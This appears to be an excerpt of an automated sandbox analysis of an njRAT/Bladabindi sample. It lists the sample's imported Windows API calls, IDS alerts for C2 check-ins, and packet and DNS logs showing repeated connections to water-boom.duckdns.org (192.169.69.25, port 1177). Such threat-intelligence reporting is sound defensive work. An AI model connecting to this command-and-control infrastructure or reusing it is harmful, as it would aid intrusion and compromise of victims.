        ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
        SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
        ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
        OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
        Language of compilation systemCountry where language is spokenMap
        EnglishGreat Britain
        EnglishUnited States
        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
        07/01/24-10:22:43.879655TCP2017419ET TROJAN Bladabindi/njrat CnC Checkin491661177192.168.2.22192.169.69.25
        07/01/24-10:25:00.126873TCP2017419ET TROJAN Bladabindi/njrat CnC Checkin491761177192.168.2.22192.169.69.25
        07/01/24-10:24:33.177434TCP2017419ET TROJAN Bladabindi/njrat CnC Checkin491741177192.168.2.22192.169.69.25
        07/01/24-10:25:27.489939TCP2017419ET TROJAN Bladabindi/njrat CnC Checkin491781177192.168.2.22192.169.69.25
        07/01/24-10:23:24.901144TCP2017419ET TROJAN Bladabindi/njrat CnC Checkin491691177192.168.2.22192.169.69.25
        07/01/24-10:24:19.571508TCP2017419ET TROJAN Bladabindi/njrat CnC Checkin491731177192.168.2.22192.169.69.25
        07/01/24-10:22:30.431063TCP2017419ET TROJAN Bladabindi/njrat CnC Checkin491651177192.168.2.22192.169.69.25
        07/01/24-10:23:52.503013TCP2017419ET TROJAN Bladabindi/njrat CnC Checkin491711177192.168.2.22192.169.69.25
        07/01/24-10:22:03.684189TCP2017419ET TROJAN Bladabindi/njrat CnC Checkin491631177192.168.2.22192.169.69.25
        07/01/24-10:23:38.664413TCP2017419ET TROJAN Bladabindi/njrat CnC Checkin491701177192.168.2.22192.169.69.25
        07/01/24-10:22:57.541620TCP2017419ET TROJAN Bladabindi/njrat CnC Checkin491671177192.168.2.22192.169.69.25
        07/01/24-10:24:46.813104TCP2017419ET TROJAN Bladabindi/njrat CnC Checkin491751177192.168.2.22192.169.69.25
        07/01/24-10:25:13.886977TCP2017419ET TROJAN Bladabindi/njrat CnC Checkin491771177192.168.2.22192.169.69.25
        07/01/24-10:24:06.132111TCP2017419ET TROJAN Bladabindi/njrat CnC Checkin491721177192.168.2.22192.169.69.25
        07/01/24-10:21:49.438511TCP2017419ET TROJAN Bladabindi/njrat CnC Checkin491621177192.168.2.22192.169.69.25
        07/01/24-10:23:11.211027TCP2017419ET TROJAN Bladabindi/njrat CnC Checkin491681177192.168.2.22192.169.69.25
        07/01/24-10:22:16.980393TCP2017419ET TROJAN Bladabindi/njrat CnC Checkin491641177192.168.2.22192.169.69.25
        TimestampSource PortDest PortSource IPDest IP
        Jul 1, 2024 10:21:49.233390093 CEST491621177192.168.2.22192.169.69.25
        Jul 1, 2024 10:21:49.238281965 CEST117749162192.169.69.25192.168.2.22
        Jul 1, 2024 10:21:49.238344908 CEST491621177192.168.2.22192.169.69.25
        Jul 1, 2024 10:21:49.438510895 CEST491621177192.168.2.22192.169.69.25
        Jul 1, 2024 10:21:49.443491936 CEST117749162192.169.69.25192.168.2.22
        Jul 1, 2024 10:21:58.999998093 CEST117749162192.169.69.25192.168.2.22
        Jul 1, 2024 10:21:59.000073910 CEST491621177192.168.2.22192.169.69.25
        Jul 1, 2024 10:22:02.155616045 CEST491621177192.168.2.22192.169.69.25
        Jul 1, 2024 10:22:02.160375118 CEST117749162192.169.69.25192.168.2.22
        Jul 1, 2024 10:22:03.676212072 CEST491631177192.168.2.22192.169.69.25
        Jul 1, 2024 10:22:03.681183100 CEST117749163192.169.69.25192.168.2.22
        Jul 1, 2024 10:22:03.681241035 CEST491631177192.168.2.22192.169.69.25
        Jul 1, 2024 10:22:03.684189081 CEST491631177192.168.2.22192.169.69.25
        Jul 1, 2024 10:22:03.691059113 CEST117749163192.169.69.25192.168.2.22
        Jul 1, 2024 10:22:13.416788101 CEST117749163192.169.69.25192.168.2.22
        Jul 1, 2024 10:22:13.416848898 CEST491631177192.168.2.22192.169.69.25
        Jul 1, 2024 10:22:15.915493011 CEST491631177192.168.2.22192.169.69.25
        Jul 1, 2024 10:22:15.920376062 CEST117749163192.169.69.25192.168.2.22
        Jul 1, 2024 10:22:16.972631931 CEST491641177192.168.2.22192.169.69.25
        Jul 1, 2024 10:22:16.977458000 CEST117749164192.169.69.25192.168.2.22
        Jul 1, 2024 10:22:16.977514029 CEST491641177192.168.2.22192.169.69.25
        Jul 1, 2024 10:22:16.980392933 CEST491641177192.168.2.22192.169.69.25
        Jul 1, 2024 10:22:16.985172033 CEST117749164192.169.69.25192.168.2.22
        Jul 1, 2024 10:22:26.670746088 CEST117749164192.169.69.25192.168.2.22
        Jul 1, 2024 10:22:26.670850992 CEST491641177192.168.2.22192.169.69.25
        Jul 1, 2024 10:22:29.175703049 CEST491641177192.168.2.22192.169.69.25
        Jul 1, 2024 10:22:29.180486917 CEST117749164192.169.69.25192.168.2.22
        Jul 1, 2024 10:22:30.423422098 CEST491651177192.168.2.22192.169.69.25
        Jul 1, 2024 10:22:30.428383112 CEST117749165192.169.69.25192.168.2.22
        Jul 1, 2024 10:22:30.428437948 CEST491651177192.168.2.22192.169.69.25
        Jul 1, 2024 10:22:30.431062937 CEST491651177192.168.2.22192.169.69.25
        Jul 1, 2024 10:22:30.436099052 CEST117749165192.169.69.25192.168.2.22
        Jul 1, 2024 10:22:40.173226118 CEST117749165192.169.69.25192.168.2.22
        Jul 1, 2024 10:22:40.173295021 CEST491651177192.168.2.22192.169.69.25
        Jul 1, 2024 10:22:42.669631004 CEST491651177192.168.2.22192.169.69.25
        Jul 1, 2024 10:22:42.674647093 CEST117749165192.169.69.25192.168.2.22
        Jul 1, 2024 10:22:43.871829033 CEST491661177192.168.2.22192.169.69.25
        Jul 1, 2024 10:22:43.876662016 CEST117749166192.169.69.25192.168.2.22
        Jul 1, 2024 10:22:43.876718044 CEST491661177192.168.2.22192.169.69.25
        Jul 1, 2024 10:22:43.879654884 CEST491661177192.168.2.22192.169.69.25
        Jul 1, 2024 10:22:43.884468079 CEST117749166192.169.69.25192.168.2.22
        Jul 1, 2024 10:22:53.692430019 CEST117749166192.169.69.25192.168.2.22
        Jul 1, 2024 10:22:53.692595959 CEST491661177192.168.2.22192.169.69.25
        Jul 1, 2024 10:22:56.210298061 CEST491661177192.168.2.22192.169.69.25
        Jul 1, 2024 10:22:56.215200901 CEST117749166192.169.69.25192.168.2.22
        Jul 1, 2024 10:22:57.533628941 CEST491671177192.168.2.22192.169.69.25
        Jul 1, 2024 10:22:57.538625002 CEST117749167192.169.69.25192.168.2.22
        Jul 1, 2024 10:22:57.538697004 CEST491671177192.168.2.22192.169.69.25
        Jul 1, 2024 10:22:57.541620016 CEST491671177192.168.2.22192.169.69.25
        Jul 1, 2024 10:22:57.546746016 CEST117749167192.169.69.25192.168.2.22
        Jul 1, 2024 10:23:07.301902056 CEST117749167192.169.69.25192.168.2.22
        Jul 1, 2024 10:23:07.302130938 CEST491671177192.168.2.22192.169.69.25
        Jul 1, 2024 10:23:09.836111069 CEST491671177192.168.2.22192.169.69.25
        Jul 1, 2024 10:23:09.841063023 CEST117749167192.169.69.25192.168.2.22
        Jul 1, 2024 10:23:11.184724092 CEST491681177192.168.2.22192.169.69.25
        Jul 1, 2024 10:23:11.189582109 CEST117749168192.169.69.25192.168.2.22
        Jul 1, 2024 10:23:11.189645052 CEST491681177192.168.2.22192.169.69.25
        Jul 1, 2024 10:23:11.211026907 CEST491681177192.168.2.22192.169.69.25
        Jul 1, 2024 10:23:11.216376066 CEST117749168192.169.69.25192.168.2.22
        Jul 1, 2024 10:23:21.077224016 CEST117749168192.169.69.25192.168.2.22
        Jul 1, 2024 10:23:21.077430010 CEST491681177192.168.2.22192.169.69.25
        Jul 1, 2024 10:23:23.588432074 CEST491681177192.168.2.22192.169.69.25
        Jul 1, 2024 10:23:23.593616962 CEST117749168192.169.69.25192.168.2.22
        Jul 1, 2024 10:23:24.893331051 CEST491691177192.168.2.22192.169.69.25
        Jul 1, 2024 10:23:24.898138046 CEST117749169192.169.69.25192.168.2.22
        Jul 1, 2024 10:23:24.898195028 CEST491691177192.168.2.22192.169.69.25
        Jul 1, 2024 10:23:24.901144028 CEST491691177192.168.2.22192.169.69.25
        Jul 1, 2024 10:23:24.906815052 CEST117749169192.169.69.25192.168.2.22
        Jul 1, 2024 10:23:34.700531960 CEST117749169192.169.69.25192.168.2.22
        Jul 1, 2024 10:23:34.700599909 CEST491691177192.168.2.22192.169.69.25
        Jul 1, 2024 10:23:37.207242012 CEST491691177192.168.2.22192.169.69.25
        Jul 1, 2024 10:23:37.212090969 CEST117749169192.169.69.25192.168.2.22
        Jul 1, 2024 10:23:38.652074099 CEST491701177192.168.2.22192.169.69.25
        Jul 1, 2024 10:23:38.658783913 CEST117749170192.169.69.25192.168.2.22
        Jul 1, 2024 10:23:38.658849955 CEST491701177192.168.2.22192.169.69.25
        Jul 1, 2024 10:23:38.664412975 CEST491701177192.168.2.22192.169.69.25
        Jul 1, 2024 10:23:38.669179916 CEST117749170192.169.69.25192.168.2.22
        Jul 1, 2024 10:23:48.631632090 CEST117749170192.169.69.25192.168.2.22
        Jul 1, 2024 10:23:48.631793022 CEST491701177192.168.2.22192.169.69.25
        Jul 1, 2024 10:23:51.138029099 CEST491701177192.168.2.22192.169.69.25
        Jul 1, 2024 10:23:51.143104076 CEST117749170192.169.69.25192.168.2.22
        Jul 1, 2024 10:23:52.456696987 CEST491711177192.168.2.22192.169.69.25
        Jul 1, 2024 10:23:52.462095022 CEST117749171192.169.69.25192.168.2.22
        Jul 1, 2024 10:23:52.462150097 CEST491711177192.168.2.22192.169.69.25
        Jul 1, 2024 10:23:52.503012896 CEST491711177192.168.2.22192.169.69.25
        Jul 1, 2024 10:23:52.507802963 CEST117749171192.169.69.25192.168.2.22
        Jul 1, 2024 10:24:02.339181900 CEST117749171192.169.69.25192.168.2.22
        Jul 1, 2024 10:24:02.339241982 CEST491711177192.168.2.22192.169.69.25
        Jul 1, 2024 10:24:04.850470066 CEST491711177192.168.2.22192.169.69.25
        Jul 1, 2024 10:24:04.855521917 CEST117749171192.169.69.25192.168.2.22
        Jul 1, 2024 10:24:06.123507977 CEST491721177192.168.2.22192.169.69.25
        Jul 1, 2024 10:24:06.129070044 CEST117749172192.169.69.25192.168.2.22
        Jul 1, 2024 10:24:06.129123926 CEST491721177192.168.2.22192.169.69.25
        Jul 1, 2024 10:24:06.132111073 CEST491721177192.168.2.22192.169.69.25
        Jul 1, 2024 10:24:06.138037920 CEST117749172192.169.69.25192.168.2.22
        Jul 1, 2024 10:24:15.846599102 CEST117749172192.169.69.25192.168.2.22
        Jul 1, 2024 10:24:15.846662998 CEST491721177192.168.2.22192.169.69.25
        Jul 1, 2024 10:24:18.347311020 CEST491721177192.168.2.22192.169.69.25
        Jul 1, 2024 10:24:18.353022099 CEST117749172192.169.69.25192.168.2.22
        Jul 1, 2024 10:24:19.562786102 CEST491731177192.168.2.22192.169.69.25
        Jul 1, 2024 10:24:19.568671942 CEST117749173192.169.69.25192.168.2.22
        Jul 1, 2024 10:24:19.568731070 CEST491731177192.168.2.22192.169.69.25
        Jul 1, 2024 10:24:19.571507931 CEST491731177192.168.2.22192.169.69.25
        Jul 1, 2024 10:24:19.577858925 CEST117749173192.169.69.25192.168.2.22
        Jul 1, 2024 10:24:29.287723064 CEST117749173192.169.69.25192.168.2.22
        Jul 1, 2024 10:24:29.287787914 CEST491731177192.168.2.22192.169.69.25
        Jul 1, 2024 10:24:31.799869061 CEST491731177192.168.2.22192.169.69.25
        Jul 1, 2024 10:24:31.804816008 CEST117749173192.169.69.25192.168.2.22
        Jul 1, 2024 10:24:33.169706106 CEST491741177192.168.2.22192.169.69.25
        Jul 1, 2024 10:24:33.174592972 CEST117749174192.169.69.25192.168.2.22
        Jul 1, 2024 10:24:33.174645901 CEST491741177192.168.2.22192.169.69.25
        Jul 1, 2024 10:24:33.177433968 CEST491741177192.168.2.22192.169.69.25
        Jul 1, 2024 10:24:33.182415962 CEST117749174192.169.69.25192.168.2.22
        Jul 1, 2024 10:24:42.832195044 CEST117749174192.169.69.25192.168.2.22
        Jul 1, 2024 10:24:42.832261086 CEST491741177192.168.2.22192.169.69.25
        Jul 1, 2024 10:24:45.332547903 CEST491741177192.168.2.22192.169.69.25
        Jul 1, 2024 10:24:45.337513924 CEST117749174192.169.69.25192.168.2.22
        Jul 1, 2024 10:24:46.804841995 CEST491751177192.168.2.22192.169.69.25
        Jul 1, 2024 10:24:46.809634924 CEST117749175192.169.69.25192.168.2.22
        Jul 1, 2024 10:24:46.809688091 CEST491751177192.168.2.22192.169.69.25
        Jul 1, 2024 10:24:46.813103914 CEST491751177192.168.2.22192.169.69.25
        Jul 1, 2024 10:24:46.817867994 CEST117749175192.169.69.25192.168.2.22
        Jul 1, 2024 10:24:56.436570883 CEST117749175192.169.69.25192.168.2.22
        Jul 1, 2024 10:24:56.436642885 CEST491751177192.168.2.22192.169.69.25
        Jul 1, 2024 10:24:58.935719013 CEST491751177192.168.2.22192.169.69.25
        Jul 1, 2024 10:24:58.940599918 CEST117749175192.169.69.25192.168.2.22
        Jul 1, 2024 10:25:00.095324039 CEST491761177192.168.2.22192.169.69.25
        Jul 1, 2024 10:25:00.100171089 CEST117749176192.169.69.25192.168.2.22
        Jul 1, 2024 10:25:00.100229025 CEST491761177192.168.2.22192.169.69.25
        Jul 1, 2024 10:25:00.126873016 CEST491761177192.168.2.22192.169.69.25
        Jul 1, 2024 10:25:00.131733894 CEST117749176192.169.69.25192.168.2.22
        Jul 1, 2024 10:25:10.056014061 CEST117749176192.169.69.25192.168.2.22
        Jul 1, 2024 10:25:10.056083918 CEST491761177192.168.2.22192.169.69.25
        Jul 1, 2024 10:25:12.554662943 CEST491761177192.168.2.22192.169.69.25
        Jul 1, 2024 10:25:12.891005039 CEST117749176192.169.69.25192.168.2.22
        Jul 1, 2024 10:25:13.879167080 CEST491771177192.168.2.22192.169.69.25
        Jul 1, 2024 10:25:13.883944988 CEST117749177192.169.69.25192.168.2.22
        Jul 1, 2024 10:25:13.884022951 CEST491771177192.168.2.22192.169.69.25
        Jul 1, 2024 10:25:13.886976957 CEST491771177192.168.2.22192.169.69.25
        Jul 1, 2024 10:25:13.891685009 CEST117749177192.169.69.25192.168.2.22
        Jul 1, 2024 10:25:23.730521917 CEST117749177192.169.69.25192.168.2.22
        Jul 1, 2024 10:25:23.730634928 CEST491771177192.168.2.22192.169.69.25
        Jul 1, 2024 10:25:26.236083984 CEST491771177192.168.2.22192.169.69.25
        Jul 1, 2024 10:25:26.244396925 CEST117749177192.169.69.25192.168.2.22
        Jul 1, 2024 10:25:27.482148886 CEST491781177192.168.2.22192.169.69.25
        Jul 1, 2024 10:25:27.486994028 CEST117749178192.169.69.25192.168.2.22
        Jul 1, 2024 10:25:27.487052917 CEST491781177192.168.2.22192.169.69.25
        Jul 1, 2024 10:25:27.489938974 CEST491781177192.168.2.22192.169.69.25
        Jul 1, 2024 10:25:27.494779110 CEST117749178192.169.69.25192.168.2.22
        Jul 1, 2024 10:25:37.226639032 CEST117749178192.169.69.25192.168.2.22
        Jul 1, 2024 10:25:37.226711988 CEST491781177192.168.2.22192.169.69.25
        TimestampSource PortDest PortSource IPDest IP
        Jul 1, 2024 10:21:48.948687077 CEST5291753192.168.2.228.8.8.8
        Jul 1, 2024 10:21:49.187190056 CEST53529178.8.8.8192.168.2.22
        Jul 1, 2024 10:22:03.579130888 CEST6275153192.168.2.228.8.8.8
        Jul 1, 2024 10:22:03.675848961 CEST53627518.8.8.8192.168.2.22
        Jul 1, 2024 10:22:16.964905977 CEST5789353192.168.2.228.8.8.8
        Jul 1, 2024 10:22:16.972282887 CEST53578938.8.8.8192.168.2.22
        Jul 1, 2024 10:22:30.414474010 CEST5482153192.168.2.228.8.8.8
        Jul 1, 2024 10:22:30.423101902 CEST53548218.8.8.8192.168.2.22
        Jul 1, 2024 10:22:43.775082111 CEST5471953192.168.2.228.8.8.8
        Jul 1, 2024 10:22:43.871335030 CEST53547198.8.8.8192.168.2.22
        Jul 1, 2024 10:22:57.421171904 CEST4988153192.168.2.228.8.8.8
        Jul 1, 2024 10:22:57.525254011 CEST53498818.8.8.8192.168.2.22
        Jul 1, 2024 10:22:57.526057959 CEST4988153192.168.2.228.8.8.8
        Jul 1, 2024 10:22:57.533214092 CEST53498818.8.8.8192.168.2.22
        Jul 1, 2024 10:23:11.080198050 CEST5499853192.168.2.228.8.8.8
        Jul 1, 2024 10:23:11.178054094 CEST53549988.8.8.8192.168.2.22
        Jul 1, 2024 10:23:11.178210974 CEST5499853192.168.2.228.8.8.8
        Jul 1, 2024 10:23:11.184412956 CEST53549988.8.8.8192.168.2.22
        Jul 1, 2024 10:23:24.886133909 CEST5278153192.168.2.228.8.8.8
        Jul 1, 2024 10:23:24.893004894 CEST53527818.8.8.8192.168.2.22
        Jul 1, 2024 10:23:38.442511082 CEST6392653192.168.2.228.8.8.8
        Jul 1, 2024 10:23:38.449755907 CEST53639268.8.8.8192.168.2.22
        Jul 1, 2024 10:23:38.450578928 CEST6392653192.168.2.228.8.8.8
        Jul 1, 2024 10:23:38.547743082 CEST53639268.8.8.8192.168.2.22
        Jul 1, 2024 10:23:38.547965050 CEST6392653192.168.2.228.8.8.8
        Jul 1, 2024 10:23:38.643939018 CEST53639268.8.8.8192.168.2.22
        Jul 1, 2024 10:23:38.644143105 CEST6392653192.168.2.228.8.8.8
        Jul 1, 2024 10:23:38.651654959 CEST53639268.8.8.8192.168.2.22
        Jul 1, 2024 10:23:52.449409008 CEST6551053192.168.2.228.8.8.8
        Jul 1, 2024 10:23:52.456350088 CEST53655108.8.8.8192.168.2.22
        Jul 1, 2024 10:24:06.115314007 CEST6267253192.168.2.228.8.8.8
        Jul 1, 2024 10:24:06.123188019 CEST53626728.8.8.8192.168.2.22
        Jul 1, 2024 10:24:19.455228090 CEST5647553192.168.2.228.8.8.8
        Jul 1, 2024 10:24:19.555124998 CEST53564758.8.8.8192.168.2.22
        Jul 1, 2024 10:24:19.555326939 CEST5647553192.168.2.228.8.8.8
        Jul 1, 2024 10:24:19.562397003 CEST53564758.8.8.8192.168.2.22
        Jul 1, 2024 10:24:32.959522963 CEST4938453192.168.2.228.8.8.8
        Jul 1, 2024 10:24:33.057414055 CEST53493848.8.8.8192.168.2.22
        Jul 1, 2024 10:24:33.057579994 CEST4938453192.168.2.228.8.8.8
        Jul 1, 2024 10:24:33.154347897 CEST53493848.8.8.8192.168.2.22
        Jul 1, 2024 10:24:33.160860062 CEST4938453192.168.2.228.8.8.8
        Jul 1, 2024 10:24:33.167848110 CEST53493848.8.8.8192.168.2.22
        Jul 1, 2024 10:24:46.601497889 CEST5484253192.168.2.228.8.8.8
        Jul 1, 2024 10:24:46.700021029 CEST53548428.8.8.8192.168.2.22
        Jul 1, 2024 10:24:46.700238943 CEST5484253192.168.2.228.8.8.8
        Jul 1, 2024 10:24:46.797113895 CEST53548428.8.8.8192.168.2.22
        Jul 1, 2024 10:24:46.797359943 CEST5484253192.168.2.228.8.8.8
        Jul 1, 2024 10:24:46.804418087 CEST53548428.8.8.8192.168.2.22
        Jul 1, 2024 10:25:00.088176012 CEST5810553192.168.2.228.8.8.8
        Jul 1, 2024 10:25:00.094950914 CEST53581058.8.8.8192.168.2.22
        Jul 1, 2024 10:25:13.871896982 CEST6492853192.168.2.228.8.8.8
        Jul 1, 2024 10:25:13.878819942 CEST53649288.8.8.8192.168.2.22
        Jul 1, 2024 10:25:27.467930079 CEST5739053192.168.2.228.8.8.8
        Jul 1, 2024 10:25:27.474947929 CEST53573908.8.8.8192.168.2.22
        Jul 1, 2024 10:25:27.475079060 CEST5739053192.168.2.228.8.8.8
        Jul 1, 2024 10:25:27.481844902 CEST53573908.8.8.8192.168.2.22
        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
        Jul 1, 2024 10:21:48.948687077 CEST192.168.2.228.8.8.80x72ccStandard query (0)water-boom.duckdns.orgA (IP address)IN (0x0001)false
        Jul 1, 2024 10:22:03.579130888 CEST192.168.2.228.8.8.80xe344Standard query (0)water-boom.duckdns.orgA (IP address)IN (0x0001)false
        Jul 1, 2024 10:22:16.964905977 CEST192.168.2.228.8.8.80x7989Standard query (0)water-boom.duckdns.orgA (IP address)IN (0x0001)false
        Jul 1, 2024 10:22:30.414474010 CEST192.168.2.228.8.8.80xe221Standard query (0)water-boom.duckdns.orgA (IP address)IN (0x0001)false
        Jul 1, 2024 10:22:43.775082111 CEST192.168.2.228.8.8.80x2f1fStandard query (0)water-boom.duckdns.orgA (IP address)IN (0x0001)false
        Jul 1, 2024 10:22:57.421171904 CEST192.168.2.228.8.8.80xae13Standard query (0)water-boom.duckdns.orgA (IP address)IN (0x0001)false
        Jul 1, 2024 10:22:57.526057959 CEST192.168.2.228.8.8.80xae13Standard query (0)water-boom.duckdns.orgA (IP address)IN (0x0001)false
        Jul 1, 2024 10:23:11.080198050 CEST192.168.2.228.8.8.80xa9aStandard query (0)water-boom.duckdns.orgA (IP address)IN (0x0001)false
        Jul 1, 2024 10:23:11.178210974 CEST192.168.2.228.8.8.80xa9aStandard query (0)water-boom.duckdns.orgA (IP address)IN (0x0001)false
        Jul 1, 2024 10:23:24.886133909 CEST192.168.2.228.8.8.80x2c8Standard query (0)water-boom.duckdns.orgA (IP address)IN (0x0001)false
        Jul 1, 2024 10:23:38.442511082 CEST192.168.2.228.8.8.80x5291Standard query (0)water-boom.duckdns.orgA (IP address)IN (0x0001)false
        Jul 1, 2024 10:23:38.450578928 CEST192.168.2.228.8.8.80x5291Standard query (0)water-boom.duckdns.orgA (IP address)IN (0x0001)false
        Jul 1, 2024 10:23:38.547965050 CEST192.168.2.228.8.8.80x5291Standard query (0)water-boom.duckdns.orgA (IP address)IN (0x0001)false
        Jul 1, 2024 10:23:38.644143105 CEST192.168.2.228.8.8.80x5291Standard query (0)water-boom.duckdns.orgA (IP address)IN (0x0001)false
        Jul 1, 2024 10:23:52.449409008 CEST192.168.2.228.8.8.80xfbddStandard query (0)water-boom.duckdns.orgA (IP address)IN (0x0001)false
        Jul 1, 2024 10:24:06.115314007 CEST192.168.2.228.8.8.80x5c1eStandard query (0)water-boom.duckdns.orgA (IP address)IN (0x0001)false
        Jul 1, 2024 10:24:19.455228090 CEST192.168.2.228.8.8.80x8d87Standard query (0)water-boom.duckdns.orgA (IP address)IN (0x0001)false
        Jul 1, 2024 10:24:19.555326939 CEST192.168.2.228.8.8.80x8d87Standard query (0)water-boom.duckdns.orgA (IP address)IN (0x0001)false
        Jul 1, 2024 10:24:32.959522963 CEST192.168.2.228.8.8.80x69cdStandard query (0)water-boom.duckdns.orgA (IP address)IN (0x0001)false
        Jul 1, 2024 10:24:33.057579994 CEST192.168.2.228.8.8.80x69cdStandard query (0)water-boom.duckdns.orgA (IP address)IN (0x0001)false
        Jul 1, 2024 10:24:33.160860062 CEST192.168.2.228.8.8.80x69cdStandard query (0)water-boom.duckdns.orgA (IP address)IN (0x0001)false
        Jul 1, 2024 10:24:46.601497889 CEST192.168.2.228.8.8.80x23d5Standard query (0)water-boom.duckdns.orgA (IP address)IN (0x0001)false
        Jul 1, 2024 10:24:46.700238943 CEST192.168.2.228.8.8.80x23d5Standard query (0)water-boom.duckdns.orgA (IP address)IN (0x0001)false
        Jul 1, 2024 10:24:46.797359943 CEST192.168.2.228.8.8.80x23d5Standard query (0)water-boom.duckdns.orgA (IP address)IN (0x0001)false
        Jul 1, 2024 10:25:00.088176012 CEST192.168.2.228.8.8.80x1dcbStandard query (0)water-boom.duckdns.orgA (IP address)IN (0x0001)false
        Jul 1, 2024 10:25:13.871896982 CEST192.168.2.228.8.8.80x9764Standard query (0)water-boom.duckdns.orgA (IP address)IN (0x0001)false
        Jul 1, 2024 10:25:27.467930079 CEST192.168.2.228.8.8.80x6436Standard query (0)water-boom.duckdns.orgA (IP address)IN (0x0001)false
        Jul 1, 2024 10:25:27.475079060 CEST192.168.2.228.8.8.80x6436Standard query (0)water-boom.duckdns.orgA (IP address)IN (0x0001)false
        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
        Jul 1, 2024 10:21:49.187190056 CEST8.8.8.8192.168.2.220x72ccNo error (0)water-boom.duckdns.org192.169.69.25A (IP address)IN (0x0001)false
        Jul 1, 2024 10:22:03.675848961 CEST8.8.8.8192.168.2.220xe344No error (0)water-boom.duckdns.org192.169.69.25A (IP address)IN (0x0001)false
        Jul 1, 2024 10:22:16.972282887 CEST8.8.8.8192.168.2.220x7989No error (0)water-boom.duckdns.org192.169.69.25A (IP address)IN (0x0001)false
        Jul 1, 2024 10:22:30.423101902 CEST8.8.8.8192.168.2.220xe221No error (0)water-boom.duckdns.org192.169.69.25A (IP address)IN (0x0001)false
        Jul 1, 2024 10:22:43.871335030 CEST8.8.8.8192.168.2.220x2f1fNo error (0)water-boom.duckdns.org192.169.69.25A (IP address)IN (0x0001)false
        Jul 1, 2024 10:22:57.525254011 CEST8.8.8.8192.168.2.220xae13No error (0)water-boom.duckdns.org192.169.69.25A (IP address)IN (0x0001)false
        Jul 1, 2024 10:22:57.533214092 CEST8.8.8.8192.168.2.220xae13No error (0)water-boom.duckdns.org192.169.69.25A (IP address)IN (0x0001)false
        Jul 1, 2024 10:23:11.178054094 CEST8.8.8.8192.168.2.220xa9aNo error (0)water-boom.duckdns.org192.169.69.25A (IP address)IN (0x0001)false
        Jul 1, 2024 10:23:11.184412956 CEST8.8.8.8192.168.2.220xa9aNo error (0)water-boom.duckdns.org192.169.69.25A (IP address)IN (0x0001)false
        Jul 1, 2024 10:23:24.893004894 CEST8.8.8.8192.168.2.220x2c8No error (0)water-boom.duckdns.org192.169.69.25A (IP address)IN (0x0001)false
        Jul 1, 2024 10:23:38.449755907 CEST8.8.8.8192.168.2.220x5291No error (0)water-boom.duckdns.org192.169.69.25A (IP address)IN (0x0001)false
        Jul 1, 2024 10:23:38.547743082 CEST8.8.8.8192.168.2.220x5291No error (0)water-boom.duckdns.org192.169.69.25A (IP address)IN (0x0001)false
        Jul 1, 2024 10:23:38.643939018 CEST8.8.8.8192.168.2.220x5291No error (0)water-boom.duckdns.org192.169.69.25A (IP address)IN (0x0001)false
        Jul 1, 2024 10:23:38.651654959 CEST8.8.8.8192.168.2.220x5291No error (0)water-boom.duckdns.org192.169.69.25A (IP address)IN (0x0001)false
        Jul 1, 2024 10:23:52.456350088 CEST8.8.8.8192.168.2.220xfbddNo error (0)water-boom.duckdns.org192.169.69.25A (IP address)IN (0x0001)false
        Jul 1, 2024 10:24:06.123188019 CEST8.8.8.8192.168.2.220x5c1eNo error (0)water-boom.duckdns.org192.169.69.25A (IP address)IN (0x0001)false
        Jul 1, 2024 10:24:19.555124998 CEST8.8.8.8192.168.2.220x8d87No error (0)water-boom.duckdns.org192.169.69.25A (IP address)IN (0x0001)false
        Jul 1, 2024 10:24:19.562397003 CEST8.8.8.8192.168.2.220x8d87No error (0)water-boom.duckdns.org192.169.69.25A (IP address)IN (0x0001)false
        Jul 1, 2024 10:24:33.057414055 CEST8.8.8.8192.168.2.220x69cdNo error (0)water-boom.duckdns.org192.169.69.25A (IP address)IN (0x0001)false
        Jul 1, 2024 10:24:33.154347897 CEST8.8.8.8192.168.2.220x69cdNo error (0)water-boom.duckdns.org192.169.69.25A (IP address)IN (0x0001)false
        Jul 1, 2024 10:24:33.167848110 CEST8.8.8.8192.168.2.220x69cdNo error (0)water-boom.duckdns.org192.169.69.25A (IP address)IN (0x0001)false
        Jul 1, 2024 10:24:46.700021029 CEST8.8.8.8192.168.2.220x23d5No error (0)water-boom.duckdns.org192.169.69.25A (IP address)IN (0x0001)false
        Jul 1, 2024 10:24:46.797113895 CEST8.8.8.8192.168.2.220x23d5No error (0)water-boom.duckdns.org192.169.69.25A (IP address)IN (0x0001)false
        Jul 1, 2024 10:24:46.804418087 CEST8.8.8.8192.168.2.220x23d5No error (0)water-boom.duckdns.org192.169.69.25A (IP address)IN (0x0001)false
